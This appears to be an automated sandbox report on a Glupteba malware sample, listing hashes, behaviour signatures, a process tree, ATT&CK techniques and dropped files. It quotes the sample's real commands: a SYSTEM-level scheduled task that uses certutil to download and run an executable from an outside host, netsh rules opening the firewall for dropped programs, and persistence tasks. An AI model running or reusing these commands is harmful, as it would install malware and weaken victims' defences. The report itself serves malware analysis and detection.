Analysis

  • max time kernel
    172s
  • max time network
    191s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 04:43

General

  • Target

    c3b1956078d866046d5adc72ca9a789bc927ad9ac5c78f7561ce1486bdf0268c.exe

  • Size

    3.9MB

  • MD5

    efe13634aff9b30cb883a896caf1fe5c

  • SHA1

    25156c407fa7232ead17306db29cb7595aa9e747

  • SHA256

    c3b1956078d866046d5adc72ca9a789bc927ad9ac5c78f7561ce1486bdf0268c

  • SHA512

    a92c01151664b717edf47849517dfe15653efe4acb207d20050c1196ff882a76cc3503606515126ccd2278206c1558ceb9b2906396ddc5bbb2fd1c1102a93646

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in System32 directory 6 IoCs
  • Drops file in Windows directory 4 IoCs
  • Program crash 55 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c3b1956078d866046d5adc72ca9a789bc927ad9ac5c78f7561ce1486bdf0268c.exe
    "C:\Users\Admin\AppData\Local\Temp\c3b1956078d866046d5adc72ca9a789bc927ad9ac5c78f7561ce1486bdf0268c.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4220
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 372
      2⤵
      • Program crash
      PID:912
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 376
      2⤵
      • Program crash
      PID:4192
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 376
      2⤵
      • Program crash
      PID:1968
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 608
      2⤵
      • Program crash
      PID:1268
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 708
      2⤵
      • Program crash
      PID:2904
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 728
      2⤵
      • Program crash
      PID:2704
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 748
      2⤵
      • Program crash
      PID:3640
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 720
      2⤵
      • Program crash
      PID:1520
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 748
      2⤵
      • Program crash
      PID:1940
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 660
      2⤵
      • Program crash
      PID:2764
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 692
      2⤵
      • Program crash
      PID:1884
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 728
      2⤵
      • Program crash
      PID:2604
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 844
      2⤵
      • Program crash
      PID:4368
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 608
      2⤵
      • Program crash
      PID:4564
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 624
      2⤵
      • Program crash
      PID:5068
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 660
      2⤵
      • Program crash
      PID:4528
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 780
      2⤵
      • Program crash
      PID:5056
    • C:\Users\Admin\AppData\Local\Temp\c3b1956078d866046d5adc72ca9a789bc927ad9ac5c78f7561ce1486bdf0268c.exe
      "C:\Users\Admin\AppData\Local\Temp\c3b1956078d866046d5adc72ca9a789bc927ad9ac5c78f7561ce1486bdf0268c.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2064
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 332
        3⤵
        • Program crash
        PID:4704
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 348
        3⤵
        • Program crash
        PID:636
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 332
        3⤵
        • Program crash
        PID:4652
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 644
        3⤵
        • Program crash
        PID:4180
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 660
        3⤵
        • Program crash
        PID:2596
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 692
        3⤵
        • Program crash
        PID:1532
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 692
        3⤵
        • Program crash
        PID:2672
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 704
        3⤵
        • Program crash
        PID:4728
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 732
        3⤵
        • Program crash
        PID:3140
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1560
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b.exe" enable=yes
          4⤵
            PID:1252
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4196
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
            4⤵
              PID:4288
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1348
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 368
              4⤵
              • Program crash
              PID:2356
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 372
              4⤵
              • Program crash
              PID:2620
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 372
              4⤵
              • Program crash
              PID:2260
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 548
              4⤵
              • Program crash
              PID:5012
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 600
              4⤵
              • Program crash
              PID:392
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:2464
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:4764
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 636
              4⤵
              • Program crash
              PID:3192
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 776
              4⤵
              • Program crash
              PID:668
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 880
              4⤵
              • Program crash
              PID:3016
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 904
              4⤵
              • Program crash
              PID:832
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 904
              4⤵
              • Program crash
              PID:4184
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 928
              4⤵
              • Program crash
              PID:1300
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 932
              4⤵
              • Program crash
              PID:2324
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1064
              4⤵
              • Program crash
              PID:1980
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1080
              4⤵
              • Program crash
              PID:1064
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1044
              4⤵
              • Program crash
              PID:1644
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:4748
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1152
              4⤵
              • Program crash
              PID:2780
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1168
              4⤵
              • Program crash
              PID:5000
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:3912
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1204
              4⤵
              • Program crash
              PID:4368
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1280
              4⤵
              • Program crash
              PID:4476
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1296
              4⤵
              • Program crash
              PID:4496
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1272
              4⤵
              • Program crash
              PID:5024
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1152
              4⤵
              • Program crash
              PID:2880
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1132
              4⤵
              • Program crash
              PID:4200
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1384
              4⤵
              • Program crash
              PID:4220
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1780
              4⤵
              • Program crash
              PID:3944
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1988
              4⤵
              • Program crash
              PID:636
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 2008
              4⤵
              • Program crash
              PID:4716
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 956
              4⤵
              • Program crash
              PID:4704
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1824
              4⤵
              • Program crash
              PID:4864
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4220 -ip 4220
        1⤵
          PID:1420
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4220 -ip 4220
          1⤵
            PID:3632
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4220 -ip 4220
            1⤵
              PID:4048
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4220 -ip 4220
              1⤵
                PID:1116
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4220 -ip 4220
                1⤵
                  PID:1516
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4220 -ip 4220
                  1⤵
                    PID:1980
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4220 -ip 4220
                    1⤵
                      PID:1064
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4220 -ip 4220
                      1⤵
                        PID:1236
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4220 -ip 4220
                        1⤵
                          PID:1928
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4220 -ip 4220
                          1⤵
                            PID:1476
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4220 -ip 4220
                            1⤵
                              PID:4940
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4220 -ip 4220
                              1⤵
                                PID:1072
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4220 -ip 4220
                                1⤵
                                  PID:4344
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4220 -ip 4220
                                  1⤵
                                    PID:4224
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4220 -ip 4220
                                    1⤵
                                      PID:3440
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4220 -ip 4220
                                      1⤵
                                        PID:4424
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4220 -ip 4220
                                        1⤵
                                          PID:4128
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                          1⤵
                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:2156
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2064 -ip 2064
                                          1⤵
                                            PID:876
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2064 -ip 2064
                                            1⤵
                                              PID:4236
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2064 -ip 2064
                                              1⤵
                                                PID:64
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2064 -ip 2064
                                                1⤵
                                                  PID:3828
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2064 -ip 2064
                                                  1⤵
                                                    PID:2396
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2064 -ip 2064
                                                    1⤵
                                                      PID:3712
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2064 -ip 2064
                                                      1⤵
                                                        PID:4584
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2064 -ip 2064
                                                        1⤵
                                                          PID:1096
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2064 -ip 2064
                                                          1⤵
                                                            PID:2352
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1348 -ip 1348
                                                            1⤵
                                                              PID:2100
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1348 -ip 1348
                                                              1⤵
                                                                PID:3464
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1348 -ip 1348
                                                                1⤵
                                                                  PID:3936
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1348 -ip 1348
                                                                  1⤵
                                                                    PID:1840
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1348 -ip 1348
                                                                    1⤵
                                                                      PID:2244
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1348 -ip 1348
                                                                      1⤵
                                                                        PID:2436
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1348 -ip 1348
                                                                        1⤵
                                                                          PID:1608
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1348 -ip 1348
                                                                          1⤵
                                                                            PID:3636
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1348 -ip 1348
                                                                            1⤵
                                                                              PID:2440
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1348 -ip 1348
                                                                              1⤵
                                                                                PID:3892
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1348 -ip 1348
                                                                                1⤵
                                                                                  PID:3956
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1348 -ip 1348
                                                                                  1⤵
                                                                                    PID:4604
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1348 -ip 1348
                                                                                    1⤵
                                                                                      PID:1680
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1348 -ip 1348
                                                                                      1⤵
                                                                                        PID:2704
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1348 -ip 1348
                                                                                        1⤵
                                                                                          PID:1388
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1348 -ip 1348
                                                                                          1⤵
                                                                                            PID:1880
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1348 -ip 1348
                                                                                            1⤵
                                                                                              PID:2928
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1348 -ip 1348
                                                                                              1⤵
                                                                                                PID:2160
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1348 -ip 1348
                                                                                                1⤵
                                                                                                  PID:4564
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1348 -ip 1348
                                                                                                  1⤵
                                                                                                    PID:4440
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1348 -ip 1348
                                                                                                    1⤵
                                                                                                      PID:4528
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1348 -ip 1348
                                                                                                      1⤵
                                                                                                        PID:3376
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1348 -ip 1348
                                                                                                        1⤵
                                                                                                          PID:4796
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1348 -ip 1348
                                                                                                          1⤵
                                                                                                            PID:1100
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1348 -ip 1348
                                                                                                            1⤵
                                                                                                              PID:4460
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1348 -ip 1348
                                                                                                              1⤵
                                                                                                                PID:4236
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1348 -ip 1348
                                                                                                                1⤵
                                                                                                                  PID:64
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1348 -ip 1348
                                                                                                                  1⤵
                                                                                                                    PID:4264
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1348 -ip 1348
                                                                                                                    1⤵
                                                                                                                      PID:2396

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                    Execution

                                                                                                                    Scheduled Task

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Persistence

                                                                                                                    Modify Existing Service

                                                                                                                    1
                                                                                                                    T1031

                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                    1
                                                                                                                    T1060

                                                                                                                    Scheduled Task

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Privilege Escalation

                                                                                                                    Scheduled Task

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Defense Evasion

                                                                                                                    Modify Registry

                                                                                                                    2
                                                                                                                    T1112

                                                                                                                    Install Root Certificate

                                                                                                                    1
                                                                                                                    T1130

                                                                                                                    Discovery

                                                                                                                    Query Registry

                                                                                                                    1
                                                                                                                    T1012

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                                                                                                      Filesize

                                                                                                                      1.7MB

                                                                                                                      MD5

                                                                                                                      13aaafe14eb60d6a718230e82c671d57

                                                                                                                      SHA1

                                                                                                                      e039dd924d12f264521b8e689426fb7ca95a0a7b

                                                                                                                      SHA256

                                                                                                                      f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

                                                                                                                      SHA512

                                                                                                                      ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

                                                                                                                    • C:\Windows\rss\csrss.exe
                                                                                                                      Filesize

                                                                                                                      3.9MB

                                                                                                                      MD5

                                                                                                                      efe13634aff9b30cb883a896caf1fe5c

                                                                                                                      SHA1

                                                                                                                      25156c407fa7232ead17306db29cb7595aa9e747

                                                                                                                      SHA256

                                                                                                                      c3b1956078d866046d5adc72ca9a789bc927ad9ac5c78f7561ce1486bdf0268c

                                                                                                                      SHA512

                                                                                                                      a92c01151664b717edf47849517dfe15653efe4acb207d20050c1196ff882a76cc3503606515126ccd2278206c1558ceb9b2906396ddc5bbb2fd1c1102a93646

                                                                                                                    • C:\Windows\rss\csrss.exe
                                                                                                                      Filesize

                                                                                                                      3.9MB

                                                                                                                      MD5

                                                                                                                      efe13634aff9b30cb883a896caf1fe5c

                                                                                                                      SHA1

                                                                                                                      25156c407fa7232ead17306db29cb7595aa9e747

                                                                                                                      SHA256

                                                                                                                      c3b1956078d866046d5adc72ca9a789bc927ad9ac5c78f7561ce1486bdf0268c

                                                                                                                      SHA512

                                                                                                                      a92c01151664b717edf47849517dfe15653efe4acb207d20050c1196ff882a76cc3503606515126ccd2278206c1558ceb9b2906396ddc5bbb2fd1c1102a93646

                                                                                                                    • memory/1252-136-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/1348-146-0x0000000000400000-0x00000000036CF000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      50.8MB

                                                                                                                    • memory/1348-143-0x0000000005800000-0x0000000005BA7000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      3.7MB

                                                                                                                    • memory/1348-140-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/1560-134-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/2064-137-0x0000000000400000-0x00000000036CF000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      50.8MB

                                                                                                                    • memory/2064-135-0x00000000053B9000-0x0000000005760000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      3.7MB

                                                                                                                    • memory/2064-133-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/2464-145-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/3912-149-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4196-138-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4220-130-0x00000000053C9000-0x0000000005770000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      3.7MB

                                                                                                                    • memory/4220-132-0x0000000000400000-0x00000000036CF000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      50.8MB

                                                                                                                    • memory/4220-131-0x0000000005780000-0x0000000005E76000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      7.0MB

                                                                                                                    • memory/4288-139-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4748-147-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4764-144-0x0000000000000000-mapping.dmp